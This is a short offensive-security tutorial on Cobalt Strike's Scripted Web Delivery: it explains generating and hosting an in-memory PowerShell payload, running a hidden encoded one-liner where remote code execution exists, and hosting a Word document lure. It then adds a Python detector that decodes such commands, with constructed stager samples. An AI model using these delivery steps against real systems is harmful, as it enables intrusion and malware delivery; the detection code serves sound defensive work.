Attacks

- Scripted Web Delivery (S)

The easiest to leverage is the PowerShell payload. In Cobalt Strike, go to Attacks > Scripted Web Delivery (S) and generate a 64-bit PowerShell payload for a listener. The URI path can be anything.

This will generate a PowerShell payload and host it on the team server so that it can be downloaded over HTTP and executed in-memory. After clicking Launch, Cobalt Strike will generate the PowerShell one-liner that will do just that.

Copy/paste this line where you have RCE. It's good practice to encode the IEX part of the command (to encode the command, go to Exploitation/Remote Shell/Reverse Shell - Powershell/to encode commands):

powershell -nop -w hidden -enc {encoded command}

Then, to host a file containing that payload, for example a Word document:

Go to Site Management > Host File and select your document.
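
On the detection side, the `powershell -nop -w hidden -enc` one-liner above leaves a recognisable process command line. The following Python check is an added example, not part of the original page or of Cobalt Strike: it parses command lines from process-creation logs, decodes the `-enc` argument (Base64 of UTF-16LE) and flags bodies that combine IEX with an HTTP(S) URL. The sample lines, the `Get-Placeholder` name and the 192.0.2.10 address are constructed.

```python
import base64
import re

def encode_ps(script):
    """Encode text the way -EncodedCommand expects: Base64 of UTF-16LE."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")

def _is_flag(token, full, min_len=1):
    """True if token is '-' or '/' plus a prefix of `full` (PowerShell accepts abbreviations)."""
    name = token[1:].lower()
    return token[:1] in "-/" and len(name) >= min_len and full.startswith(name)

def analyze(cmdline):
    """Inspect one process command line and return what was found."""
    found = {"noprofile": False, "hidden": False, "decoded": None, "iex": False, "url": None}
    tokens = cmdline.split()  # simplification: assumes no quoted arguments with spaces
    if not tokens or "powershell" not in tokens[0].lower():
        return found
    for tok, nxt in zip(tokens[1:], tokens[2:] + [""]):
        if _is_flag(tok, "noprofile", 3):
            found["noprofile"] = True
        elif _is_flag(tok, "windowstyle") and nxt.lower() == "hidden":
            found["hidden"] = True
        elif (_is_flag(tok, "encodedcommand") or tok.lower() in ("-ec", "/ec")) and nxt:
            try:
                found["decoded"] = base64.b64decode(nxt, validate=True).decode("utf-16-le")
            except ValueError:  # not valid Base64 / UTF-16LE; leave decoded as None
                pass
    text = found["decoded"] or ""
    found["iex"] = bool(re.search(r"(?i)\b(iex|invoke-expression)\b", text))
    m = re.search(r"(?i)https?://[^\s'\")]+", text)
    found["url"] = m.group(0) if m else None
    return found

def is_web_delivery_like(cmdline):
    """Flag an encoded command whose decoded body both invokes IEX and names an HTTP(S) URL."""
    f = analyze(cmdline)
    return bool(f["decoded"] and f["iex"] and f["url"])

# Constructed samples. Get-Placeholder is a made-up stand-in; 192.0.2.10 is a documentation address.
STAGER = encode_ps("IEX (Get-Placeholder 'http://192.0.2.10/a')")
SAMPLES = [
    "powershell -nop -w hidden -enc " + STAGER,
    "powershell.exe -NoProfile -WindowStyle Hidden -EncodedCommand " + STAGER,
    "powershell -NoProfile -File C:\\scripts\\backup.ps1",
    "powershell -enc " + encode_ps("Get-Date"),
]
```

Matching on the decoded body rather than on the flags alone keeps encoded administrative commands such as the last sample from being flagged.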
